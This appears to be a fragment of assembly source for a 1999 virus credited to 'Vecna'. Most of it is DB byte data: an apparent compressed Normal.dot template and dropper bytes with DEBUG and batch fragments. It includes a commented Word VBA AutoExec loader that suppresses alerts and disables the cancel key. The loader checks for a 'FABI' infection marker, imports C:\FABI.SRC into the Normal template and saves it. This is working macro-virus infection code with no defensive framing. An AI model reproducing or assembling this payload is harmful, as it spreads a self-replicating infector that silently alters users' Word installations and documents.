DB 012H,005H,056H,045H,044H,04FH,043H,012H,029H,04EH,054H,002H,08EH,0EFH,014H
DB 00FH,098H,00EH,098H,00FH,030H,00FH,0C8H,04EH,003H,030H,00FH,098H,00FH,098H
DB 042H,049H,006H,098H,04BH,00BH,098H,053H,045H,054H,0BCH,0F4H,020H,04EH,013H
DB 04AH,01FH,02CH,00FH,064H,005H,064H,04AH,00BH,0FCH,00DH,00AH,003H,03EH,041H
DB 003H,03EH,00FH,0A2H,00FH,03EH,005H,03EH,056H,024H,04BH,00DH,03EH,013H,072H
DB 054H,018H,041H,020H,012H,042H,03CH,03EH,020H,01BH,043H,00DH,00AH,012H,01EH
DB 044H,045H,010H,065H,04CH,045H,054H,045H,014H,067H,020H,031H,02CH,002H,0ADH
DB 02EH,014H,0B1H,04FH,046H,004H,013H,004H,023H,049H,060H,00FH,04EH,053H,045H
DB 052H,054H,004H,010H,003H,023H,041H,00AH,055H,002H,00CH,00BH,02FH,022H,0A9H
DB 045H,04EH,044H,020H,0F0H,0F3H,049H,046H,00DH,00AH,002H,07EH,002H,01DH,004H
DB 035H,012H,0BFH,00FH,07EH,012H,0C1H,00DH,00AH,002H,020H,00EH,07EH,002H,012H
DB 00BH,04FH,07FH,042H,004H,023H,00EH,07EH,002H,0B3H,008H,055H,002H,00CH,00BH
DB 02FH,00AH,07EH,04FH,050H,022H,022H,022H,043H,03AH,05CH,033H,04FH,02EH,020H
DB 000H,042H,041H,054H,022H,020H,023H,023H,04FH,055H,054H,050H,055H,054H,020H
DB 041H,053H,020H,011H,000H,022H,0D1H,050H,052H,049H,012H,09BH,023H,031H,02CH
DB 022H,040H,044H,045H,042H,055H,047H,020H,002H,020H,03CH,007H,030H,044H,052H
DB 056H,020H,03EH,04EH,055H,04CH,022H,00DH,00AH,00AH,025H,043H,04FH,048H,0F3H
DB 050H,059H,020H,007H,023H,045H,058H,00AH,00BH,045H,00EH,029H,006H,077H,045H
DB 058H,00EH,019H,002H,0EEH,00AH,036H,00FH,063H,075H,000H,004H,088H,04CH,00AH
DB 021H,045H,00FH,022H,00EH,022H,00AH,0A7H,043H,04CH,04FH,053H,045H,020H,023H
DB 031H,00DH,000H,000H,00AH

;-------------------------------(CUT HERE)-----------------------------------

;LZ compressed macro loader
;(c) Vecna 1999

; SUB AutoExec()
; ON ERROR GOTO ERRO
; APPLICATION.DISPLAYALERTS = FALSE
; APPLICATION.ENABLECANCELKEY = WDDISABLED
; FOR I = 1 TO NORMALTEMPLATE.VBPROJECT.VBCOMPONENTS.COUNT
; IF NORMALTEMPLATE.VBPROJECT.VBCOMPONENTS(I).CODEMODULE.LINES(1,1) = "'FABI" THEN GOTO ERRO
; NEXT I
; NORMALTEMPLATE.VBPROJECT.VBCOMPONENTS.IMPORT("C:\FABI.SRC")
; NORMALTEMPLATE.SAVE
; ERRO:
; END SUB

normaldot_size	EQU 12493
normaldot equ this byte
DB 000H,000H,000H,000H,000H,002H,0D0H,0CFH,011H,0E0H,0A1H,0B1H,01AH
DB 0E1H,000H,00EH,001H,03EH,000H,003H,000H,0FEH,0FFH,0A8H,061H,009H,000H,006H
DB 00AH,018H,001H,002H,00CH,021H,002H,004H,004H,003H,010H,000H,000H,023H,002H
DB 009H,003H,014H,0FEH,0C8H,0FFH,0FFH,0FFH,0FFH,002H,00BH,000H,020H,002H,005H
DB 002H,00BH,00FH,003H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,007H,000H,00FH,010H,00FH,010H,00CH,010H
DB 0ECH,0A5H,0C1H,000H,049H,000H,016H,004H,007H,000H,001H,012H,0BFH,00FH,001H
DB 012H,0C0H,002H,003H,012H,0DAH,002H,006H,004H,000H,000H,001H,002H,004H,00EH
DB 000H,062H,06AH,062H,06AH,0B2H,018H,000H,0B3H,0B2H,0B3H,002H,014H,00EH,003H
DB 016H,004H,016H,000H,01EH,01CH,000H,000H,0D0H,0D9H,001H,08FH,0AEH,004H,004H
DB 023H,00CH,00EH,023H,00CH,00FH,0FFH,0FFH,00FH,004H,010H,002H,002H,006H,00FH
DB 00CH,002H,013H,000H,00BH,040H,05DH,003H,011H,0F4H,06DH,000H,08CH,004H,006H
DB 000H,004H,008H,00BH,00CH,003H,017H,00FH,010H,003H,010H,014H,003H,019H,006H
DB 004H,0A0H,00FH,008H,00EH,010H,0FDH,0C8H,0FAH,01AH,000H,000H,003H,030H,011H
DB 01BH,005H,008H,007H,030H,0E4H,002H,087H,0B6H,002H,02CH,007H,010H,00FH,008H
DB 00FH,010H,00FH,010H,0D5H,0AEH,007H,010H,02CH,002H,048H,0A3H,002H,048H,0CFH
DB 002H,008H,002H,007H,000H,00FH,008H,00FH,010H,007H,010H,09AH,012H,01FH,0F4H
DB 002H,034H,0DAH,0FFH,08EH,012H,07EH,03EH,002H,039H,003H,018H,015H,002H,008H
DB 00FH,003H,003H,0F0H,003H,014H,007H,070H,003H,00CH,00BH,004H,007H,018H,00FH
DB 008H,007H,010H,0FFH,0FFH,003H,058H,003H,030H,007H,010H,007H,050H,007H,008H
DB 007H,018H,003H,024H,003H,004H,007H,010H,00FH,008H,00FH,010H,007H,010H,00FH
DB 048H,00FH,010H,013H,020H,003H,058H,0FFH,0FFH,00FH,004H,007H,040H,007H,008H
DB 007H,038H,00FH,008H,007H,010H,007H,028H,007H,050H,003H,010H,003H,01CH,003H
DB 008H,00BH,05CH,007H,020H,003H,01CH,003H,018H,007H,008H,07FH,005H,003H,00CH
DB 00FH,004H,00FH,010H,00FH,010H,003H,010H,007H,050H,007H,068H,025H,022H,048H
DB 00CH,002H,019H,060H,0EAH,081H,032H,059H,0F8H,0FFH,06FH,0BEH,001H,007H,018H
DB 00FH,008H,007H,038H,002H,02BH,00FH,003H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,002H,010H,0FEH,0FFH,00DH,002H,004H,00FH
DB 003H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,017H,054H,00FH,010H,00CH,010H,042H,066H,001H,002H,004H,003H,012H,000H
DB 000H,004H,002H,004H,00AH,002H,004H,00BH,002H,004H,00DH,055H,055H,002H,004H
DB 00EH,002H,004H,00FH,002H,004H,010H,002H,004H,011H,002H,004H,012H,002H,004H
DB 013H,002H,004H,014H,002H,004H,015H,055H,055H,002H,004H,016H,002H,004H,017H
DB 002H,004H,018H,002H,004H,019H,002H,004H,01AH,002H,004H,01BH,002H,004H,01CH
DB 002H,004H,01DH,055H,055H,002H,004H,01EH,002H,004H,01FH,002H,004H,020H,002H
DB 004H,021H,002H,004H,022H,002H,004H,023H,002H,004H,07AH,002H,004H,07BH,055H
DB 055H,002H,004H,083H,002H,004H,084H,002H,004H,08CH,002H,004H,08DH,002H,004H
DB 093H,002H,004H,094H,002H,004H,095H,002H,004H,096H,055H,055H,002H,004H,09CH
DB 002H,004H,09DH,002H,004H,0C2H,002H,004H,0D6H,002H,004H,0D7H,002H,004H,0DDH
DB 002H,004H,0DEH,002H,004H,0DFH,055H,056H,002H,004H,0E0H,002H,004H,0E6H,002H
DB 004H,0E7H,002H,004H,00AH,013H,052H,0C6H,002H,004H,015H,002H,004H,021H,002H
DB 004H,022H,055H,055H,002H,004H,023H,002H,004H,02EH,002H,004H,02FH,002H,004H
DB 037H,002H,004H,038H,002H,004H,098H,002H,004H,099H,002H,004H,0A3H,055H,055H
DB 002H,004H,0A4H,002H,004H,0A5H,002H,004H,0A6H,002H,004H,0B3H,002H,004H,0B4H
DB 002H,004H,0F4H,002H,004H,0FBH,002H,004H,0FCH,055H,015H,002H,004H,002H,062H
DB 01FH,003H,002H,004H,007H,002H,004H,008H,002H,004H,012H,002H,004H,013H,002H
DB 004H,000H,0FBH,0F2H,081H,000H,002H,002H,000H,0ECH,000H,0E6H,000H,0E0H,004H
DB 004H,0DAH,000H,0DAH,000H,0D4H,000H,0CEH,000H,0F0H,03FH,0C8H,000H,0C2H,000H
DB 003H,01BH,006H,004H,005H,028H,002H,00DH,004H,009H,005H,005H,003H,00EH,003H
DB 004H,002H,041H,002H,007H,0FBH,0F2H,001H,0A0H,013H,08CH,00AH,009H,06AH,003H
DB 000H,0E8H,0F0H,06DH,048H,000H,004H,000H,004H,00CH,0F3H,00AH,00CH,0AAH,08AH
DB 0E7H,00AH,00CH,0DFH,00AH,00CH,04BH,00AH,00CH,04AH,00AH,00CH,04CH,00AH,00CH
DB 0E0H,005H,00CH,010H,003H,06AH,003H,067H,000H,050H,055H,008H,001H,068H,008H
DB 000H,06EH,048H,016H,004H,000H,007H,007H,009H,04CH,002H,073H,000H,0F7H,05FH
DB 023H,000H,013H,0ECH,013H,0E8H,012H,012H,04CH,013H,0E0H,013H,0DCH,013H,0D8H
DB 013H,0D4H,013H,0D0H,013H,0CCH,013H,0C8H,013H,0C4H,024H,002H,024H,03DH,055H
DB 0ABH,002H,004H,046H,002H,004H,04BH,002H,004H,05BH,002H,004H,071H,002H,004H
DB 013H,0D8H,09EH,002H,008H,0A8H,002H,004H,0B5H,002H,004H,075H,06DH,013H,0B8H
DB 0E8H,002H,008H,0FCH,002H,004H,013H,0A0H,013H,090H,039H,012H,058H,0FDH,003H
DB 08EH,007H,004H,0FBH,007H,009H,003H,008H,0F9H,0CFH,0FFH,003H,005H,007H,004H
DB 00FH,00DH,007H,018H,000H,000H,00FH,01AH,00FH,01AH,006H,010H,00FH,027H,006H
DB 017H,002H,007H,00FH,01AH,002H,013H,006H,003H,00CH,01AH,0FFH,07EH,00CH,0A9H
DB 00FH,00DH,006H,031H,002H,007H,00FH,01AH,002H,013H,006H,003H,00CH,01AH,0F7H
DB 006H,015H,004H,007H,00CH,01AH,00FH,00DH,004H,022H,004H,005H,0F5H,0DFH,056H
DB 004H,006H,006H,005H,00FH,027H,006H,017H,002H,007H,0F3H,002H,004H,008H,003H
DB 0F1H,008H,00AH,005H,009H,001H,012H,07FH,001H,012H,077H,001H,0DAH,014H,019H
DB 092H,0D3H,018H,002H,004H,092H,086H,001H,092H,0E5H,082H,064H,000H,01CH,027H
DB 000H,0D9H,022H,0D8H,0FEH,0FEH,000H,0FFH,0FFH,00FH,001H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,07FH,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00CH,010H,002H,000H
DB 000H,001H,001H,002H,01CH,000H,01FH,0B0H,0D0H,02FH,020H,0B0H,0E0H,03DH,021H
DB 0B0H,0A5H,004H,0F9H,006H,022H,002H,004H,023H,090H,089H,005H,024H,002H,004H
DB 025H,0B0H,00CH,02DH,00FH,00DH,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,0FFH,0C7H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,006H,010H,0E7H,000H,000H,000H,002H,0EDH,000H
DB 042H,035H,0DFH,0FFH,043H,014H,0EFH,000H,006H,037H,004H,007H,0EFH,000H,0D9H
DB 0C2H,0BAH,004H,019H,00FH,005H,006H,010H,0D7H,0F4H,003H,00FH,00FH,00CH,003H
DB 014H,00BH,004H,0E2H,000H,079H,0DFH,042H,0A3H,022H,003H,002H,014H,006H,008H
DB 073H,0D2H,002H,00EH,000H,00FH,008H,00BH,010H,042H,0C5H,003H,023H,004H,004H
DB 036H,042H,0F3H,003H,009H,041H,0F7H,003H,008H,01CH,006H,000H,000H,02DH,0D2H
DB 0F0H,0D0H,002H,011H,0D3H,0F8H,002H,007H,000H,003H,008H,003H,030H,0E7H,000H
DB 003H,028H,0ADH,0F6H,003H,018H,0F4H,0B2H,0C8H,073H,097H,031H,002H,008H,0ACH
DB 002H,011H,0DDH,002H,008H,002H,007H,000H,00FH,008H,00FH,010H,00FH,010H,003H
DB 010H,0BDH,0C9H,013H,011H,0DFH,006H,040H,00FH,008H,00FH,010H,007H,010H,0E6H
DB 0F2H,052H,0E3H,000H,0DAH,01EH,003H,076H,000H,000H,003H,018H,0EFH,000H,0FFH
DB 001H,003H,01AH,007H,0F8H,003H,068H,003H,010H,00FH,004H,007H,018H,00FH,008H
DB 007H,010H,003H,058H,000H,000H,012H,000H,00FH,000H,00AH,01DH,020H,0F2H,07AH
DB 05BH,002H,008H,003H,0AEH,003H,046H,024H,000H,000H,040H,0F1H,0FFH,002H,000H
DB 002H,008H,000H,006H,000H,030H,000H,04EH,000H,06FH,000H,072H,000H,06DH,000H
DB 061H,000H,06CH,002H,01DH,003H,024H,004H,000H,00EH,020H,06DH,083H,045H,002H
DB 00EH,00DH,003H,036H,000H,041H,040H,0F2H,0FFH,0A1H,000H,036H,002H,017H,013H
DB 000H,002H,008H,046H,002H,038H,06EH,000H,074H,000H,065H,000H,020H,000H,070H
DB 002H,03EH,072H,000H,0E1H,000H,0A8H,047H,067H,000H,02EH,006H,00EH,064H,002H
DB 054H,0E3H,002H,022H,002H,02BH,00CH,003H,063H,095H,002H,000H,000H,0D2H,049H
DB 001H,00CH,011H,000H,0FFH,004H,001H,002H,00EH,000H,005H,000H,056H,002H,048H
DB 063H,000H,06EH,002H,048H,03CH,000H,043H,040H,040H,000H,03AH,000H,05CH,000H
DB 041H,002H,042H,071H,000H,075H,000H,069H,000H,076H,002H,048H,073H,010H,0B5H
DB 000H,020H,000H,064H,002H,024H,020H,000H,050H,002H,018H,06FH,002H,06AH,072H
DB 002H,02CH,003H,0B6H,073H,002H,02CH,0AAH,020H,04DH,002H,026H,063H,004H,018H
DB 073H,002H,02CH,066H,002H,096H,020H,000H,04FH,000H,066H,002H,002H,069H,000H
DB 062H,057H,063H,002H,036H,05CH,000H,04DH,002H,018H,003H,040H,06CH,002H,008H
DB 003H,032H,00BH,0F6H,02EH,002H,05AH,06FH,002H,034H,0FFH,0CAH,0C0H,001H,003H
DB 09EH,056H,004H,0B0H,0FFH,0FFH,004H,007H,00AH,005H,010H,0FFH,0FFH,001H,000H
DB 002H,072H,052H,00DH,03BH,088H,05AH,054H,000H,068H,002H,07DH,073H,000H,044H
DB 002H,059H,063H,002H,0AFH,06DH,002H,06FH,013H,017H,02EH,002H,0C1H,075H,041H
DB 015H,002H,055H,06FH,000H,045H,000H,078H,002H,014H,063H,012H,085H,011H,003H
DB 060H,01CH,012H,072H,04FH,000H,052H,011H,050H,002H,092H,041H,000H,04CH,012H
DB 030H,054H,000H,048H,000H,049H,000H,053H,002H,041H,04FH,002H,0FAH,055H,015H
DB 044H,002H,018H,045H,002H,022H,054H,002H,01AH,041H,000H,055H,000H,054H,002H
DB 0C8H,045H,000H,058H,002H,045H,043H,079H,000H,002H,08CH,040H,002H,032H,02DH
DB 002H,008H,072H,0E5H,002H,006H,020H,000H,000H,008H,000H,040H,000H,000H,003H
DB 011H,080H,002H,00CH,047H,016H,090H,002H,05DH,002H,002H,006H,003H,005H,004H
DB 005H,002H,003H,004H,003H,014H,0EFH,06AH,002H,017H,008H,003H,002H,01DH,004H
DB 00CH,054H,002H,0ADH,003H,0A3H,013H,050H,04EH,002H,097H,077H,012H,058H,052H
DB 002H,0BBH,013H,04AH,06EH,001H,000H,002H,022H,035H,010H,090H,001H,002H,000H
DB 005H,005H,001H,002H,001H,007H,006H,002H,005H,05EH,0C0H,007H,002H,013H,003H
DB 003H,007H,077H,003H,00CH,080H,003H,005H,053H,000H,079H,000H,06DH,000H,062H
DB 002H,03AH,023H,036H,084H,0D7H,033H,022H,004H,07EH,00BH,006H,004H,002H,003H
DB 001H,00FH,07EH,002H,0FBH,003H,034H,000H,012H,013H,072H,002H,080H,025H,06AH
DB 080H,020H,022H,000H,004H,000H,031H,008H,088H,082H,0B1H,0C4H,002H,000H,000H
DB 0A9H,004H,0A1H,0FBH,07DH,040H,0C3H,033H,026H,000H,080H,033H,046H,003H,02EH
DB 001H,008H,036H,009H,00EH,004H,000H,003H,010H,004H,029H,003H,013H,0FFH,0FFH
DB 002H,004H,005H,024H,00BH,012H,002H,015H,00FH,003H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,0FFH,000H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,006H,010H,0A5H,006H,0C0H,007H,0B4H,000H,0B4H,000H,0F0H,0CFH
DB 080H,000H,012H,030H,006H,013H,00FH,007H,00FH,010H,00FH,010H,00FH,010H,00AH
DB 010H,012H,0E3H,002H,00EH,0FFH,0FFH,062H,077H,002H,008H,01FH,090H,009H,003H
DB 03BH,0FAH,00BH,00CH,009H,022H,009H,00AH,0A1H,03CH,0E5H,026H,065H,066H,0C7H
DB 032H,030H,083H,005H,003H,00BH,080H,000H,002H,08BH,0EEH,085H,0F6H,075H,09FH
DB 004H,017H,03BH,005H,024H,0E4H,026H,065H,00FH,083H,030H,001H,0B8H,023H,008H
DB 000H,004H,011H,002H,028H,051H,000H,006H,028H,05DH,05FH,05EH,05BH,0C2H,004H
DB 000H,000H,058H,08BH,075H,014H,08BH,06DH,010H,0E9H,077H,0FFH,0FFH,0FFH,004H
DB 023H,007H,034H,08EH,00AH,034H,050H,000H,000H,000H,0EBH,0CAH,08BH,044H,024H
DB 008H,056H,00FH,0B7H,0C8H,0F7H,0C1H,000H,0FCH,0FFH,084H,040H,0FFH,0BEH,002H
DB 081H,080H,00FH,084H,08BH,002H,025H,0FFH,074H,024H,010H,056H,050H,002H,006H
DB 014H,000H,000H,0FFH,015H,040H,011H,010H,065H,050H,0E8H,0B2H,081H,005H,000H
DB 05EH,0C2H,00CH,000H,0A5H,039H,002H,014H,00CH,008H,004H,015H,034H,004H,01CH
DB 096H,002H,01CH,002H,01BH,0A1H,03CH,002H,099H,002H,089H,002H,006H,028H,08BH
DB 022H,002H,00DH,003H,00DH,039H,00DH,040H,002H,00DH,00FH,082H,044H,002H,053H
DB 08BH,008H,08BH,054H,024H,00CH,040H,000H,0C1H,0E2H,010H,081H,0E1H,003H,052H
DB 011H,066H,0C7H,040H,004H,000H,000H,080H,0C9H,003H,090H,000H,089H,008H,081H
DB 0E1H,043H,084H,00BH,0CAH,002H,020H,008H,089H,008H,089H,050H,014H,08BH,04CH
DB 0E0H,0B8H,024H,004H,089H,048H,010H,002H,053H,00FH,0A1H,002H,032H,00FH,084H
DB 007H,002H,04EH,002H,083H,008H,0A1H,04CH,004H,085H,0FFH,0FFH,002H,0BDH,00FH
DB 003H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH
DB 0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,0E5H,000H,00CH,010H,0FEH,0E2H,0C8H,004H,000H,0B5H
DB 07EH,00BH,019H,0D3H,034H,0E0H,085H,09FH,0F2H,0F9H,04FH,068H,010H,000H,09DH
DB 0ABH,091H,008H,000H,02BH,027H,0B3H,0D9H,0B3H,0F7H,050H,002H,019H,0D3H,0EDH
DB 002H,007H,000H,088H,002H,031H,06DH,06AH,003H,03AH,090H,002H,008H,0E3H,050H
DB 09CH,002H,008H,0A2H,09EH,000H,0A8H,002H,008H,005H,002H,004H,0B8H,002H,004H
DB 0E3H,021H,0C4H,055H,0ABH,002H,008H,008H,002H,004H,0D4H,002H,004H,009H,002H
DB 004H,0E4H,002H,004H,0B3H,0E8H,0F0H,002H,008H,00AH,002H,004H,00CH,002H,04DH
DB 0A9H,0AAH,0F2H,0F1H,000H,018H,002H,008H,00DH,002H,010H,024H,002H,008H,00EH
DB 002H,008H,030H,002H,008H,00FH,002H,008H,038H,002H,008H,0D5H,03AH,003H,074H
DB 040H,002H,008H,013H,002H,010H,048H,002H,008H,003H,078H,0E4H,002H,06DH,01EH
DB 002H,010H,002H,00FH,002H,006H,073H,000H,005H,01FH,00FH,00CH,006H,002H,016H
DB 056H,065H,063H,06EH,061H,0F2H,0E8H,008H,01CH,002H,010H,003H,00CH,003H,098H
DB 04EH,06FH,072H,0DCH,030H,06DH,061H,0E2H,09FH,003H,010H,009H,02CH,000H,004H
DB 048H,003H,060H,031H,000H,063H,06EH,003H,01CH,003H,074H,04DH,069H,000H,080H
DB 063H,072H,06FH,073H,06FH,066H,074H,020H,057H,06FH,072H,064H,020H,038H,02EH
DB 012H,00DH,041H,001H,0F2H,05BH,000H,000H,046H,0C3H,023H,002H,067H,000H,004H
DB 00CH,0F2H,0C1H,0F0H,058H,06FH,0BEH,001H,0E1H,0FFH,004H,00CH,038H,085H,014H
DB 059H,002H,00CH,013H,018H,003H,0A0H,003H,008H,003H,028H,00FH,008H,003H,014H
DB 00FH,004H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH
DB 0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,02CH,00FH,010H,00FH,010H,00FH,010H,00BH,010H,0FEH
DB 0FFH,000H,000H,004H,000H,0E3H,0EEH,00BH,016H,000H,004H,012H,002H,0D5H,000H
DB 080H,0CDH,0D5H,09CH,02EH,01BH,010H,093H,097H,008H,000H,02BH,02CH,0F9H,0AEH
DB 044H,002H,023H,0EAH,0ACH,005H,00EH,014H,02CH,0E2H,0DDH,0E8H,002H,018H,0F3H
DB 0C0H,002H,00BH,000H,068H,002H,00CH,0F3H,0B4H,070H,002H,008H,005H,002H,004H
DB 056H,055H,07CH,002H,004H,0F3H,05CH,084H,002H,008H,011H,002H,004H,08CH,002H
DB 004H,017H,002H,004H,094H,002H,004H,00BH,002H,004H,09CH,05BH,0D5H,002H,004H
DB 0F3H,0DCH,0A4H,002H,008H,0F3H,068H,0ACH,002H,008H,016H,002H,004H,0B4H,002H
DB 004H,00DH,002H,004H,0BCH,002H,004H,003H,05CH,02EH,07CH,0C9H,002H,008H,003H
DB 0A6H,0F7H,0F4H,004H,002H,010H,032H,039H,041H,000H,0F3H,050H,003H,078H,00BH
DB 008H,002H,01BH,004H,018H,0B3H,078H,0E7H,00DH,008H,000H,003H,064H,003H,010H
DB 00FH,008H,007H,010H,01EH,002H,07DH,003H,040H,003H,004H,000H,00CH,002H,00DH
DB 003H,065H,0F3H,0F5H,002H,03BH,007H,002H,036H,054H,0EDH,074H,075H,06CH,06FH
DB 004H,04CH,003H,020H,098H,002H,013H,003H,068H,002H,007H,000H,020H,0ABH,00BH
DB 002H,005H,003H,014H,036H,002H,008H,002H,002H,004H,03EH,002H,004H,003H,010H
DB 003H,00CH,00AH,002H,00CH,05FH,050H,049H,044H,060H,005H,05FH,047H,055H,049H
DB 044H,014H,04AH,003H,0B6H,041H,002H,016H,04EH,002H,004H,07BH,000H,032H,000H
DB 031H,000H,001H,000H,039H,000H,045H,000H,034H,000H,030H,002H,004H,041H,000H
